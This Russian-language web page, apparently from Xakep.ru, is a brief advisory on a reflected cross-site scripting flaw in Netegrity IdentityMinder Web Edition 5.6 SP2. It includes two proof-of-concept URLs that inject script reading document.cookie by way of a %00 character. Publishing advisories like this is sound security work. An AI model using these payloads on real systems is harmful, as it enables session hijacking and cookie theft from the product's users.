Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Программа: IdentityMinder Web Edition 5.6 SP2 

Уязвимость в Netegrity IdentityMinder Web Edition позволяет удаленному пользователю выполнить XSS нападение.
Сервер не фильтрует HTML код в URL, который содержит '%00' символ. 

Пример: 

http://PUT_ADDRESS_HERE/idm/ PUT_SITE_NAME_HERE/ims_mainconsole_principalpo
puphandler.do?searchAttrs0=%25GROUP_NAME% 25&searchOperators0=EQUALS&searchFilter0=
&searchOrgDN=PUT_DN_HERE&incChildren OrgFlag=NO&resultsPerPage=10&oid=
&imsui_taskstate=RESOLVE_SCOPE& imsui_tpnametosearch=group &numOfExpressions=1%00<script>alert(document.cookie)
</script>

http://PUT_ADDRESS_HERE:7001/idmmanage/ mobjattr.do?diroid=PUT_OID_HERE &attrname=Group%20Members&mobjtype=2
<script>alert(document.cookie)&lt;/script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии